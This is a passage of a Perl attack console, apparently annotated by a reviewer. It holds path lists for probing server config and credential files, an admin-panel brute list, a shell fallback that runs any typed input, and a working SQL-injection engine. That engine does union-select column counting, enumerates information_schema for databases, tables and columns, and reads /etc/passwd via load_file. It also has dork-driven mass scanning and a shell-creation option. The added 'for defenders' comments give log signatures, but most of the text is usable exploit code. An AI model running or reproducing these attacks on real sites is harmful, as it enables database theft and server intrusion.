r/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cn
f','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog');

@panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx'
,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx'
,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx'
,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx'
,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx'
,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx'
,'administracion/index.asp','administracion/index.aspx','administracion/login.asp'
,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx'
,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php'
,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php'
,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php'
,'administracion/login.php','administracion/ingresar.php','administracion/admin.php'
,'administration/','administration/index.php','administration/login.php'
,'administrator/index.php','administrator/login.php','administrator/system.php','system/'
,'system/login.php','admin.php','login.php','administrador.php','administration.php'
,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php'
,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html'
,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html'
,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html'
,'administrator/','administrator/index.html','administrator/login.html'
,'administrator/account.html','administrator/account.php','administrator.html','login.html'
,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php'
,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/'
,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html'
,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp'
,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp'
,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp'
,'administrator/login.asp','administrator/account.asp','administrator.asp'
,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp'
,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/'
,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php'
,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp'
,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html'
,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html'
,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp'
,'webadmin.html','administratie/','admins/','admins.php','admins.asp'
,'admins.html','administrivia/','Database_Administration/','WebAdmin/'
,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/'
,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/'
,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/'
,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/
','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/
','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/
','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/
','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/'
,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/'
,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/'
,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/'
,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/'
,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/'
,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/'
,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/'
,'server/','database_administration/','power_user/','system_administration/'
,'ss_vms_admin_sm/');


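# Create the relative logs/webs directory that receives the per-target result
# files. The original tested the absolute path "/logs/webs" while creating the
# relative one, and passed the mode as decimal 777 rather than an octal value.
# The directory holds scan results, so it is created for the owner only.
unless (-d "logs/webs") {
    mkdir("logs/", 0700) unless -d "logs/";
    mkdir("logs/webs/", 0700);
}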

# Shared HTTP client for the whole console: browser-like User-Agent string
# and a 5 second timeout.
my $nave = LWP::UserAgent->new(
    agent   => "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12",
    timeout => 5,
);

head();

getinfo();

# NOTE(review): no sub named "next" is visible in this part of the file; if
# none exists, Ctrl-C ends the program with an undefined-subroutine error.
$SIG{INT} = \&next;

# Prompt loop: switch colour, serve one command, restore the colour.
while (1) {
    cprint "\x037"; #13
    menujo();
    cprint "\x030";
}

sub getinfo {
    # Store the OS name, the login name and the domain name in the package
    # globals $so, $login and $domain, then print them in colour.
    ($so, $login, $domain) = (
        $^O,
        scalar(Win32::LoginName()),
        scalar(Win32::DomainName()),
    );
    cprint "\x0313"; #13
    print "\n\n[SO] : $so [Login] : $login [Group] : $domain\n\n";
    cprint "\x030";
}


# Read one line from STDIN and dispatch it to the matching console command.
# The patterns are unanchored, so a line only has to contain the keyword.
# Everything typed here runs with the privileges of the account that started
# the script; unmatched input is handed to the system shell (final else).
sub menujo {
print "\n\n>";
chomp (my $cmd = <stdin>);
print "\n\n";

# This "if" stands alone: after getinfo() the line is still tested by the
# chain below and, matching nothing there, also reaches the final else.
if ($cmd=~/getinfo/ig) {
getinfo();
}
if ($cmd =~/getip (.*)/) {
my $te = $1;
if ($te eq "" or $te eq " ") {
print "\n[+] sintax : getip <host>\n";
}
# The lookup below runs even when the syntax hint was printed.
print "\n[IP] : ".getip($1)."\n";
print "\n";
}

elsif ($cmd =~/getlink (.*)/) {
print "[+] Extracting links in the page\n\n\n";
$code = toma($1);
my @re = get_links($code);
for my $url(@re) {
print "[Link] : $url\n";
}
print "\n\n[+] Finish\n";
}

elsif ($cmd=~/help/) {
helpme();
}

elsif ($cmd=~/getprocess/) {
my %re = getprocess();


for my $data(keys %re) {
# $t is not assigned in this sub; $proceso and $pid are not used below.
($proceso,$pid) = ($t=~/(.*):(.*)/ig);
print "[+] Proceso : ".$data."\n";
print "[+] PID : ".$re{$data}."\n\n";
}
}
elsif ($cmd=~/killprocess (.*) (.*)/) {
if (killprocess($1,$2)) {
print "[+] Process $1 closed";
}
}
elsif ($cmd=~/conec (.*) (.*) (.*)/) {
print conectar($1,$2,$3);
}
elsif ($cmd=~/allow (.*)/) {
# Sends a plain GET to port 80 and prints any Allow: header in the reply.
$re = conectar($1,"80","GET / HTTP/1.0\r\n");
if ($re=~/Allow:(.*)/ig) {
print "[+] Metodos : ".$1."\n";
}}
elsif ($cmd=~/paths (.*)/) {
scanpaths($1);
}
elsif ($cmd=~/encodehex (.*)/) {
print "\n\n[+] ".hex_en($1)."\n\n";
}
elsif ($cmd=~/decodehex (.*)/) {
print "\n\n[+] ".hex_de($1)."\n\n";
}
elsif ($cmd=~/download (.*) (.*)/) {
# Precedence: this declares only $file and assigns nothing useful; the
# call below uses the captures $1 and $2 directly.
my $file,$name = $1,$2;
if (download($1,$2)) {
print "[+] File downloaded\n";
}
}
elsif ($cmd=~/encodeascii (.*)/) {
print "\n\n[+] ".ascii($1)."\n\n";
}
elsif ($cmd=~/decodeascii (.*)/) {
print "\n\n[+] ".ascii_de($1)."\n\n";
}
elsif ($cmd=~/encodebase (.*)/) {
print "\n\n[+] ".base($1)."\n\n";
}
elsif ($cmd=~/decodebase (.*)/) {
print "\n\n[+] ".base_de($1)."\n\n";
}
elsif ($cmd=~/aboutme/) {
aboutme();
}
elsif ($cmd=~/scanport (.*)/) {
scanport($1);
}
elsif ($cmd=~/panel (.*)/) {
scanpanel($1);
}
elsif ($cmd=~/scangoogle/) {
# Search-engine results are collected with google() and every URL that
# contains "=" is cut after its last "=" and passed to sql().
print "[Dork] : ";
chomp(my $dork = <stdin>);
print "\n\n[Pages] : ";
chomp(my $pages = <stdin>);
print "\n\n[Starting the search]\n\n";
my @links = google($dork,$pages);
print "\n[Links Found] : ".int(@links)."\n\n\n";
print "[Starting the scan]\n\n\n";
for my $link(@links) {
if ($link=~/(.*)=/ig) {
my $web = $1;
sql($web."=");
}}
print "\n\n[+] Finish\n";
}
elsif ($cmd=~/getpass (.*)/) {
crackit($1);
}
elsif ($cmd=~/ftp (.*) (.*) (.*)/) {
ftp($1,$2,$3);
}
elsif ($cmd=~/navegator/) {
# Nested file-manager prompt, implemented as a label plus "goto nave".
nave:
print getcwd().">";
chomp(my $rta = <stdin>);
print "\n\n";
if ($rta=~/list/) {
my @files = coleccionar(getcwd());
for(@files) {
if (-f $_) {
print "[File] : ".$_."\n";
} else {
print "[Directory] : ".$_."\n";
}}}
if ($rta=~/cd (.*)/) {
my $dir = $1;
if (chdir($dir)) {
print "\n[+] Directory changed\n";
} else {
print "\n[-] Error\n";
}}
if ($rta=~/del (.*)/) {
# Anything that is not a plain file is passed to rmdir().
my $file = getcwd()."/".$1;
if (-f $file) {
if (unlink($file)) {
print "\n[+] File Deleted\n";
} else {
print "\n[-] Error\n";
}
} else {
if (rmdir($file)) {
print "\n[+] Directory Deleted\n";
} else {
print "\n[-] Error\n";
}}}
if ($rta=~/rename (.*) (.*)/) {
if (rename(getcwd()."/".$1,getcwd()."/".$2)) {
print "\n[+] File Changed\n";
} else {
print "\n[-] Error\n";
}}
if ($rta=~/open (.*)/) {
# Single-string system(): the typed text is run as a command line.
my $file = $1;
chomp $file;
system($file);
#system(getcwd()."/".$file);
}
if ($rta=~/help/) {
print "\nCommands : help cd list del rename open exit\n\n";
}
if ($rta=~/exit/) {
# No loop exists inside this sub; "next" acts on the loop of the caller.
next;
}
print "\n\n";
goto nave;
}
elsif ($cmd=~/kobra (.*)/) {
my $url = $1;
chomp $url;
scansqli($url,"--");
}
elsif ($cmd=~/mysql (.*) (.*) (.*)/) {
enter($1,$2,$3);
}
elsif ($cmd=~/exit/) {
copyright();
<stdin>;
exit(1);
}
else {
# Fallback: the whole input line is executed through the system shell.
system($cmd);
}
#print "\n\n";
}


# Entry point of the SQL-injection client (reached from the "kobra" command).
#   $_[0] - target URL
#   $_[1] - value handed to bypass(), which is defined outside this view
# Two requests are sent that differ only in an appended "and 1=0" / "and 1=1"
# condition; different response bodies are taken as a sign that the parameter
# reaches a SQL query. For defenders: such request pairs from one client are
# visible in web-server access logs, and parameterised queries on the server
# make both requests return the same page.
sub scansqli {

my $page = $_[0];
print "[Status] : Scanning.....\n";
# The second return value is stored in $bypass2; $pass2 used below is a
# package global that this sub does not assign.
($pass1,$bypass2) = &bypass($_[1]);
my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
# The host part of the URL becomes the base name of the log file.
my $save = $auth;

# A URL that already contains the placeholder "hackman" skips the probe.
if ($_[0]=~/hackman/ig) {
savefile($save.".txt","\n[Target Confirmed] : $_[0]\n");
# $pass is not assigned anywhere in this sub.
&menu_options($_[0],$pass,$save);
} else {

my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2);
my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2);

unless ($testar1 eq $testar2) {
motor($page,$_[1]);
} else {
print "\n[-] Not vulnerable\n\n";
print "[+] Scan anyway y/n : ";
chomp(my $op = <stdin>);
if ($op eq "y") {
motor($page,$_[1]);
} else {
#head();
#menu();
}}}}

# Run the column-count search (the file's own length() sub, called with &)
# for URL $_[0] and bypass value $_[1], then open the interactive menu when
# that search reports success.
sub motor {

my ($gen,$save,$control) = &length($_[0],$_[1]);

if ($control eq 1) {
print "[Status] : Enjoy the menu\n\n";
# $pass is not assigned in this sub; it is read as a package global.
&menu_options($gen,$pass,$save);
} else {
print "[Status] : Length columns not found\n\n";
}
}

# Search for the number of columns of the injected query. The sub shares its
# name with the Perl builtin and is therefore called as &length(...).
#   $_[0] - target URL, $_[1] - value handed to bypass()
# Returns (URL template containing the placeholder "hackman", log base name,
# 1) on success; falls off the end without a value after 200 attempts.
# For defenders: the loop sends up to 199 requests whose query string holds
# "union select" followed by a growing list of char(...) values; the marker
# RATSXPDOWN<n>RATSXPDOWN is sent as character codes and only appears in
# clear in a response when the injection worked.
sub length {
print "\n[+] Looking for the number of columns\n\n";
my $rows  = "0";
my $asc;
my $page = $_[0];
($pass1,$pass2) = &bypass($_[1]);

$alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
$total = "1";
for my $rows(2..200) {
$asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
$total.= ",".$rows;
$injection = $page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
$test = toma($injection);
if ($test=~/RATSXPDOWN/) {
# Column numbers whose marker is echoed back in the page.
@number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
$control = 1;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
savefile($save.".txt","\n[Target confirmed] : $page");
savefile($save.".txt","[Bypass] : $_[1]\n");
savefile($save.".txt","[Limit] : The site has $rows columns");
savefile($save.".txt","[Data] : The number @number print data");
# The first echoed column number is replaced by the placeholder that the
# other subs later substitute with their own expression.
$total=~s/$number[0]/hackman/;
savefile($save.".txt","[SQLI] : ".$page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
return($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
}
}
}

# Probe what the database account behind the injected query may read and
# print/log the server version, database name and user.
#   $page - URL template containing the placeholder "hackman"
#   $bypass - value handed to bypass(); $save - base name of the log file
# char(69,82,84,79,82,56,53,52) is the marker "ERTOR854" and
# 0x2f6574632f706173737764 is "/etc/passwd".
# For defenders: the three probes succeed only when the application's
# database account can read information_schema.tables, SELECT from mysql.user
# or use load_file(); an account without SELECT on mysql.user and without the
# FILE privilege answers OFF to the last two. The strings mysql.user,
# information_schema and load_file( in a query string are log signatures.
sub details {
my ($page,$bypass,$save) = @_;
($pass1,$pass2) = &bypass($bypass);
savefile($save.".txt","\n");
if ($page=~/(.*)hackman(.*)/ig) {
print "\n[+] Searching information..\n\n";
# Text before and after the placeholder in the URL template.
my  ($start,$end) = ($1,$2);
$inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
$mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
$test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
$test1 = toma($inforschema);
$test2 = toma($mysqluser);
if ($test2=~/ERTOR854/ig) {
savefile($save.".txt","[mysql.user] : ON");
print "[mysql.user] : ON\n";
} else {
print "[mysql.user] : OFF\n";
savefile($save.".txt","[mysql.user] : OFF");
}
if ($test1=~/ERTOR854/ig) {
print "[information_schema.tables] : ON\n";
savefile($save.".txt","[information_schema.tables] : ON");
} else {
print "[information_schema.tables] : OFF\n";
savefile($save.".txt","[information_schema.tables] : OFF");
}
# Nothing is printed or logged when the load_file probe fails.
if ($test3=~/ERTOR854/ig) {
print "[load_file] : ON\n";
savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
}
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
$injection = $start.$concat.$end.$pass2;
$code = toma($injection);
# The captured values come from the remote response and are printed and
# written to the log unmodified.
if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";
savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
} else {
print "\n[-] Not found any data\n";
}
}
}


# Interactive sub-menu for one target. $_[0] is the URL template, $_[1] the
# bypass value; the log base name is recomputed from the URL host. One
# command is read and dispatched; most branches then call reload.
sub menu_options {

my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
print "\n/logs/webs/$save>";
chomp (my $rta = <stdin>);

# "help" is a stand-alone test; the line then also falls into the chain
# below and ends in its final else (reload).
if ($rta=~/help/) {
print qq(

commands : details tables columns dbs othertable othercolumn
           mysqluser dumper createshell readfile logs exit

);
}


# "&reload;" without parentheses passes the current @_ on to reload.
if ($rta =~/tables/) {
schematables($_[0],$_[1],$save);
&reload;
}
elsif ($rta =~/columns (.*)/) {
my $tabla = $1;
schemacolumns($_[0],$_[1],$save,$tabla);
&reload;
}
elsif ($rta =~/dbs/) {
&schemadb($_[0],$_[1],$save);
&reload;
}
elsif ($rta =~/othertable (.*)/) {
my $data = $1;
&schematablesdb($_[0],$_[1],$data,$save);
&reload;
}
elsif ($rta =~/othercolumn (.*) (.*)/){
my ($db,$table) = ($1,$2);
&schemacolumnsdb($_[0],$_[1],$db,$table,$save);
&reload;
}
elsif ($rta =~/mysqluser/) {
&mysqluser($_[0],$_[1],$save);
&reload;
}
elsif ($rta=~/logs/) {
# The host part of the URL is interpolated into a shell command line.
$t = "logs/webs/$save.txt";
system("start $t");
&reload;
}
elsif ($rta=~/exit/) {
# No loop exists inside this sub; "next" acts on a loop of a caller.
next;
}

elsif($rta=~/createshell/) {
print "\n\n[Full Path Discloure] : ";
chomp(my $path = <STDIN>);
&into($_[0],$_[1],$path,$save);
}
elsif($rta=~/readfile/) {
loadfile($_[0],$_[1],$save);
}
elsif ($rta=~/dumper (.*) (.*) (.*)/) {
my ($tabla,$col1,$col2) = ($1,$2,$3);
&dump($_[0],$col1,$col2,$tabla,$_[1],$save);
&reload;
}
elsif ($rta =~/details/) {
&details($_[0],$_[1],$save);
&reload;
}
else {
&reload;
}
}



# List table names through information_schema.tables for the default
# database. Arguments: URL template with the placeholder "hackman", bypass
# value, log base name. char(82,65,84,83,88,80,68,79,87,78,49) is the marker
# "RATSXPDOWN1" that brackets each value in the response.
# For defenders: one request asks for Count(*), then one request per row
# follows with "limit <n>,1"; a burst of near-identical URLs that differ only
# in that number and mention information_schema is a clear log signature.
sub schematables {
$real = "1";
my ($page,$bypass,$save) = @_;
savefile($save.".txt","\n");
print "\n";
my $page1 = $page;
($pass1,$pass2) = &bypass($_[1]);
savefile($save.".txt","[DB] : default");
print "\n[+] Searching tables with schema\n\n";
$page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2);
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $resto = $1;
# The first 17 rows are skipped, presumably as system tables - TODO confirm.
$total = $resto - 17;
print "[+] Tables Length :  $total\n\n";
savefile($save.".txt","[+] Searching tables with schema\n");
savefile($save.".txt","[+] Tables Length :  $total\n");
# The loop bound is a value taken from the remote response.
my $limit = $1;
for my $limit(17..$limit) {
$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $table = $1;
chomp $table;
print "[Table $real Found : $table ]\n";
savefile($save.".txt","[Table $real Found : $table ]");
$real++;
}}
print "\n";
} else {
print "\n[-] information_schema = ERROR\n";
}
}

sub reload {
    # Show the injection menu again for the same target. Only the first
    # argument (the URL template) is forwarded to menu_options().
    my ($page) = @_;
    return menu_options($page);
}


# List the column names of one table through information_schema.columns.
# Arguments: URL template with the placeholder "hackman", bypass value, log
# base name, table name. The table name is sent as char(...) codes produced
# by ascii(), so it does not appear in clear in the request.
# For defenders: the request pattern is one Count(*) query followed by one
# "limit <n>,1" query per column against information_schema.columns.
sub schemacolumns {
my ($page,$bypass,$save,$table) = @_;
my $page3 = $page;
my $page4 = $page;
savefile($save.".txt","\n");
print "\n";
($pass1,$pass2) = &bypass($bypass);
print "\n[DB] : default\n";
savefile($save.".txt","[DB] : default");
savefile($save.".txt","[Table] : $table\n");
$page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2);
if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[Columns Length : $1 ]\n\n";
savefile($save.".txt","[Columns Length : $1 ]\n");
# The loop bound is a value taken from the remote response.
my $si = $1;
chomp $si;
$page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit2(0..$si) {
$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "[Column $real] : $1\n";
savefile($save.".txt","[Column $real] : $1");
$real++;
}}
print "\n";
} else {
print "\n[-] information_schema = ERROR\n";
}}

# List database names through information_schema.schemata, leaving out
# information_schema, mysql and phpmyadmin. Arguments: URL template with the
# placeholder "hackman", bypass value, log base name.
# For defenders: the signature is a Count(*) request followed by one
# "limit <n>,1" request per database against information_schema.schemata.
sub schemadb {
my ($page,$bypass,$save) = @_;
my $page1 = $page;
savefile($save.".txt","\n");
print "\n\n[+] Searching DBS\n\n";
($pass1,$pass2) = &bypass($bypass);
$page=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
# Unlike the per-row request below, this one is sent without $pass2.
$code = toma($page.$pass1."from".$pass1."information_schema.schemata");
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
# The loop bound is a value taken from the remote response.
my $limita = $1;
print "[+] Databases Length : $limita\n\n";
savefile($save.".txt","[+] Databases Length : $limita\n");
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit(0..$limita) {
$code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $control = $1;
if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
print "[Database $real Found] $control\n";
savefile($save.".txt","[Database $real Found] : $control");
$real++;
}
}
}
print "\n";
} else {
print "[-] information_schema = ERROR\n";
}
}

# List the table names of a named database through information_schema.tables.
#   $_[0] - URL template with the placeholder "hackman"
#   $_[1] - bypass value, $_[2] - database name, $_[3] - log base name
# The database name is sent as char(...) codes produced by ascii().
# For defenders: same request pattern as the other schema listings, here with
# a "table_schema=char(...)" condition in the query string.
sub schematablesdb {
my $page = $_[0];
my $db = $_[2];
my $page1 = $page;
savefile($_[3].".txt","\n");
print "\n\n[+] Searching tables with DB $db\n\n";
($pass1,$pass2) = &bypass($_[1]);
savefile($_[3].".txt","[DB] : $db");
$page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { 
print "[+] Tables Length :  $1\n\n";
savefile($_[3].".txt","[+] Tables Length :  $1\n");
# The loop bound is a value taken from the remote response.
my $limit = $1;
$real = "1";
for my $lim(0..$limit) {
$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $table = $1;
chomp $table;
savefile($_[3].".txt","[Table $real Found : $table ]");
print "[Table $real Found : $table ]\n";
$real++;
}}
print "\n";
} else {
print "\n[-] information_schema = ERROR\n";
}}

# schemacolumnsdb(page, bypass, db, table, save)
# Lists the column names of $table in schema $db through an injectable URL and
# logs them via savefile($save.".txt", ...).
# Defender view: the requests contain "information_schema.columns" and the same
# char(82,65,84,...) marker (RATSXPDOWN1) used by the sibling subs; table and
# schema names travel as char(<code points>) lists, so quote filtering alone
# does not stop them. Parameterised queries remove the injection point.
sub schemacolumnsdb {
my ($page,$bypass,$db,$table,$save) = @_;
my $page3 = $page;
my $page4 = $page;
print "\n\n[+] Searching columns in table $table with DB $db\n\n";
savefile($save.".txt","\n");
# $pass1/$pass2, $code3, $code4 and $real are package globals.
($pass1,$pass2) = &bypass($_[1]);
savefile($save.".txt","\n[DB] : $db");
savefile($save.".txt","[Table] : $table");
# First request: Count(*) of matching rows in information_schema.columns.
